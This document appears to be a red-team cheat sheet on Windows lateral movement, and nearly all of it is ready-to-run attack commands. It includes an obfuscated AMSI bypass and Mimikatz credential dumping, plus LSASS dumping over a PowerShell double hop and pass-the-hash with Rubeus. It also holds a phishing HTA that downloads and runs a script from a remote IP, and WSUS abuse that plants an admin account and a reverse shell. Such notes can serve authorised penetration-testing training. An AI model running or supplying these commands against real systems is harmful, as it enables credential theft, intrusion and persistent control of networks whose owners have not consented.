Lateral Movement

PSRemoting

PSRemoting Session

New-PSSession -ComputerName Target1
Enter-PSSession -ComputerName Target1
# Set TrustedHosts so PSRemoting can target an IP rather than a hostname
winrm set winrm/config/client ‘@{TrustedHosts="*"}’
# Connect with local admin creds
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}
# If you are over C2 and can't get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

PSRemoting Invoke-Command

# Execute Commands or script blocks:
Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
# Execute scripts from files:
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
# Execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
# Pass arguments:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) ArgumentList
# Function call within script is used:
Invoke-Command –Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
# Execute stateful commands:
$Sess = New-PSSession –Computername Server1
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}

Stateful Mimikatz

$sess = new-pssession -computername server1
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )}
Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -session $sess

Invoke-Mimikatz

# Dump Creds on local machine
Invoke-Mimikatz -DumpCreds
# Dump creds on multiple machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
# "Over pass the hash": generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'

Double Hop Problem

PowerShell

$cred = Get-Credential DOMAIN\USER
# Execute commands
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}
# Copy files
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}
# Dump
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}
# Copy dump back
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}
Rubeus can be used over the double hop to extract a ticket, then interact with the 3rd system:
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}

PsExec / Rubeus

# psexec to first host
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd
# Use rubeus on first host to overpass the hash and then access second host.
# NOTE: using the /domain flag makes it unreliable.
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Phish

# Generate HTA
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
# Send Email
Send-MailMessage -From 'User01 <[email protected]>' -To 'User02 <[email protected]>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF
# use Nishang to generate powershell phish payloads

Pass-The-Hash

runas /noprofile /netonly /user:<domain\username> powershell.exe
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'

PsExec

​
​

WSUS

Enumeration

# If you compromise a wsus server you can own a lot
# See which computers are connecting for updates (port 8530 = http, port 8531 = https)
netstat -ano

Abuse

https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1
# Load psexec into directory and WSUSpendu
# Send out malicious update to gain local admin on machine
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net
# Compromise isolated networks with a reverse shell
# Where the script is an AMSI bypass plus a reverse shell connecting over 8531
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>
# Listen on host and wait
powercat -l -v -p 8531